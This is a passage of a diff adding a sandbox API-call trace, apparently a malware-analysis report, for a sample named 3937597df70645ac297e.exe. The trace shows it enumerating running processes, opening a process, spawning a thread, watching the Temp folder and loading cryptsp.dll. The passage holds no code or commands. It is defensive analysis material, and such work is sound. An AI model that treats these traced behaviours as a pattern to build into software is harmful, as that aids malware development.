"return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "6080" + } + ], + "repeated": 0, + "id": 583 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "8" + } + ], + "repeated": 0, + "id": 584 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "7396" + } + ], + "repeated": 0, + "id": 585 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "3492" + } + ], + "repeated": 0, + "id": 586 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "7488" + } + ], + "repeated": 0, + "id": 587 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MicrosoftEdgeUpdate.exe" + }, + { + "name": "ProcessId", + "value": "5140" + } + ], + "repeated": 0, + "id": 588 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "upfc.exe" + }, + { + "name": "ProcessId", + "value": "944" + } + ], + "repeated": 0, + "id": 589 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "CompatTelRunner.exe" + }, + { + "name": "ProcessId", + "value": "6344" + } + ], + "repeated": 0, + "id": 590 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TrustedInstaller.exe" + }, + { + "name": "ProcessId", + "value": "4624" + } + ], + "repeated": 0, + "id": 591 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4512" + } + ], + "repeated": 0, + "id": 592 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TiWorker.exe" + }, + { + "name": "ProcessId", + "value": "6300" + } + ], + "repeated": 0, + "id": 593 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "backgroundTaskHost.exe" + }, + { + "name": "ProcessId", + "value": "4768" + } + ], + "repeated": 0, + "id": 594 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "backgroundTaskHost.exe" + }, + { + "name": "ProcessId", + "value": "8128" + } + ], + "repeated": 0, + "id": 595 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "backgroundTaskHost.exe" + }, + { + "name": "ProcessId", + "value": "6864" + } + ], + "repeated": 0, + "id": 596 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SkypeApp.exe" + }, + { + "name": "ProcessId", + "value": "2636" + } + ], + "repeated": 0, + "id": 597 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WMIADAP.exe" + }, + { + "name": "ProcessId", + "value": "396" + } + ], + "repeated": 0, + "id": 598 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "conhost.exe" + }, + { + "name": "ProcessId", + "value": "8172" + } + ], + "repeated": 0, + "id": 599 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dllhost.exe" + }, + { + "name": "ProcessId", + "value": "5748" + } + ], + "repeated": 0, + "id": 600 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MoUsoCoreWorker.exe" + }, + { + "name": "ProcessId", + "value": "8112" + } + ], + "repeated": 0, + "id": 601 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "sppsvc.exe" + }, + { + "name": "ProcessId", + "value": "616" + } + ], + "repeated": 0, + "id": 602 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7472" + } + ], + "repeated": 0, + "id": 603 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SppExtComObj.Exe" + }, + { + "name": "ProcessId", + "value": "368" + } + ], + "repeated": 0, + "id": 604 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "slui.exe" + }, + { + "name": "ProcessId", + "value": "7756" + } + ], + "repeated": 0, + "id": 605 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "184" + } + ], + "repeated": 0, + "id": 606 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "CompatTelRunner.exe" + }, + { + "name": "ProcessId", + "value": "6292" + } + ], + "repeated": 0, + "id": 607 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "slui.exe" + }, + { + "name": "ProcessId", + "value": "8200" + } + ], + "repeated": 0, + "id": 608 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "backgroundTaskHost.exe" + }, + { + "name": "ProcessId", + "value": "8668" + } + ], + "repeated": 0, + "id": 609 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "backgroundTaskHost.exe" + }, + { + "name": "ProcessId", + "value": "8760" + } + ], + "repeated": 0, + "id": 610 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8836" + } + ], + "repeated": 0, + "id": 611 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3056" + } + ], + "repeated": 0, + "id": 612 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8412" + } + ], + "repeated": 0, + "id": 613 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8936" + } + ], + "repeated": 0, + "id": 614 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8608" + } + ], + "repeated": 0, + "id": 615 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "CompatTelRunner.exe" + }, + { + "name": "ProcessId", + "value": "9048" + } + ], + "repeated": 0, + "id": 616 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8292" + } + ], + "repeated": 0, + "id": 617 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WmiPrvSE.exe" + }, + { + "name": "ProcessId", + "value": "7260" + } + ], + "repeated": 0, + "id": 618 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dllhost.exe" + }, + { + "name": "ProcessId", + "value": "9264" + } + ], + "repeated": 0, + "id": 619 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce332f", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "3937597df70645ac297e.exe" + }, + { + "name": "ProcessId", + "value": "9436" + } + ], + "repeated": 0, + "id": 620 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3707", + "parentcaller": "0x03ce332f", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + } + ], + "repeated": 0, + "id": 621 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce3298", + "parentcaller": "0x03ce6618", + "category": "process", + "api": "NtOpenProcess", + "status": false, + "return": "0xffffffffc0000022", + "pretty_return": "ACCESS_DENIED", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00001000", + "pretty_value": "PROCESS_QUERY_LIMITED_INFORMATION" + }, + { + "name": "ProcessIdentifier", + "value": "4864" + } + ], + "repeated": 0, + "id": 622 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce6d0a", + "parentcaller": "0x03ce4176", + "category": "threading", + "api": "NtCreateThreadEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0x0000032c" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "StartAddress", + "value": "0x03ce69d7" + }, + { + "name": "Parameter", + "value": "0x00000000" + }, + { + "name": "CreateFlags", + "value": "0x00000001" + }, + { + "name": "ThreadId", + "value": "5984" + }, + { + "name": "ProcessId", + "value": "9436" + } + ], + "repeated": 0, + "id": 623 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce6d0a", + "parentcaller": "0x03ce4176", + "category": "threading", + "api": "CreateThread", + "status": true, + "return": "0x0000032c", + "arguments": [ + { + "name": "StartRoutine", + "value": "0x03ce69d7" + }, + { + "name": "Parameter", + "value": "0x00000000" + }, + { + "name": "CreationFlags", + "value": "0x00000000" + }, + { + "name": "ThreadId", + "value": "5984" + } + ], + "repeated": 0, + "id": 624 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "5984", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x02403000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 625 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "5984", + "caller": "0x770564c6", + "parentcaller": "0x770563d1", + "category": "threading", + "api": "NtTestAlert", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 1, + "id": 626 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "202" + } + ], + "repeated": 0, + "id": 627 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "5984", + "caller": "0x03ce6b01", + "parentcaller": "0x00000000", + "category": "filesystem", + "api": "FindFirstChangeNotificationW", + "status": true, + "return": "0x00000334", + "arguments": [ + { + "name": "PathName", + "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\" + }, + { + "name": "NotifyFilter", + "value": "0x00000001" + }, + { + "name": "WatchSubtree", + "value": "0" + } + ], + "repeated": 0, + "id": 628 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "5984", + "caller": "0x03ce6c54", + "parentcaller": "0x03ce6b08", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000000f4" + }, + { + "name": "ValueName", + "value": "000603xx" + }, + { + "name": "Type", + "value": "1", + "pretty_value": "REG_SZ" + }, + { + "name": "Information", + "value": "kernel32.dll" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx" + } + ], + "repeated": 0, + "id": 629 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "5984", + "caller": "0x03ce6c54", + "parentcaller": "0x03ce6b08", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "kernel32.dll" + }, + { + "name": "BaseAddress", + "value": "0x760f0000" + } + ], + "repeated": 0, + "id": 630 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "5984", + "caller": "0x03ce6c54", + "parentcaller": "0x03ce6b08", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "SortGetHandle" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7610eeb0" + } + ], + "repeated": 0, + "id": 631 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "5984", + "caller": "0x03ce6c54", + "parentcaller": "0x03ce6b08", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "SortCloseHandle" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x761097e0" + } + ], + "repeated": 0, + "id": 632 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "5984", + "caller": "0x03ce6c54", + "parentcaller": "0x03ce6b08", + "category": "filesystem", + "api": "NtCreateFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000338" + }, + { + "name": "DesiredAccess", + "value": "0x80100080", + "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\Globalization\\Sorting\\sortdefault.nls" + }, + { + "name": "CreateDisposition", + "value": "1", + "pretty_value": "FILE_OPEN" + }, + { + "name": "ShareAccess", + "value": "1", + "pretty_value": "FILE_SHARE_READ" + }, + { + "name": "FileAttributes", + "value": "0x00000080", + "pretty_value": "FILE_ATTRIBUTE_NORMAL" + }, + { + "name": "ExistedBefore", + "value": "yes" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 633 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "5984", + "caller": "0x03ce6c54", + "parentcaller": "0x03ce6b08", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x0000033c" + }, + { + "name": "DesiredAccess", + "value": "0x000f0005", + "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x00000338" + } + ], + "repeated": 0, + "id": 634 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "5984", + "caller": "0x03ce6c54", + "parentcaller": "0x03ce6b08", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x0000033c" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04f40000" + }, + { + "name": "SectionOffset", + "value": "0x04f3f5ec" + }, + { + "name": "ViewSize", + "value": "0x00338000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 635 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "5984", + "caller": "0x03ce6c54", + "parentcaller": "0x03ce6b08", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000033c" + } + ], + "repeated": 0, + "id": 636 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "5984", + "caller": "0x03ce6c54", + "parentcaller": "0x03ce6b08", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000338" + } + ], + "repeated": 0, + "id": 637 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "5984", + "caller": "0x03ce6c54", + "parentcaller": "0x03ce6b08", + "category": "registry", + "api": "NtOpenKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000338" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\Sorting\\Ids" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\Sorting\\Ids" + } + ], + "repeated": 0, + "id": 638 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "5984", + "caller": "0x03ce6c54", + "parentcaller": "0x03ce6b08", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000338" + }, + { + "name": "ValueName", + "value": "es-ES" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es-ES" + } + ], + "repeated": 0, + "id": 639 + }, + { + "timestamp": "2025-03-07 22:33:08,641", + "thread_id": "5984", + "caller": "0x03ce6c54", + "parentcaller": "0x03ce6b08", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000338" + }, + { + "name": "ValueName", + "value": "es" + }, + { + "name": "Type", + "value": "1", + "pretty_value": "REG_SZ" + }, + { + "name": "Information", + "value": "{0000002B-57EE-1E5C-00B4-D0000BB1E11E}" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es" + } + ], + "repeated": 0, + "id": 640 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "process", + "api": "NtOpenSection", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d" + }, + { + "name": "ObjectAttributes", + "value": "CRYPTSP.dll" + } + ], + "repeated": 0, + "id": 641 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\CRYPTSP.dll" + } + ], + "repeated": 0, + "id": 642 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Windows\\System32\\cryptsp.dll" + } + ], + "repeated": 0, + "id": 643 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000033c" + }, + { + "name": "DesiredAccess", + "value": "0x00100021", + "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\cryptsp.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 644 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "process", + "api": "NtCreateSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000340" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d", + "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" + }, + { + "name": "ObjectAttributes", + "value": "" + }, + { + "name": "FileHandle", + "value": "0x0000033c" + } + ], + "repeated": 0, + "id": 645 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000340" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x743f0000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x00013000" + }, + { + "name": "Win32Protect", + "value": "0x00000080", + "pretty_value": "PAGE_EXECUTE_WRITECOPY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 646 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74400000" + }, + { + "name": "ModuleName", + "value": "CRYPTSP.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 647 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", + "caller": "0x03ce1f93", + "parentcaller": "0x03ce163b", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 648 + }, + { + "timestamp": "2025-03-07 22:33:08,860", + "thread_id": "9440", 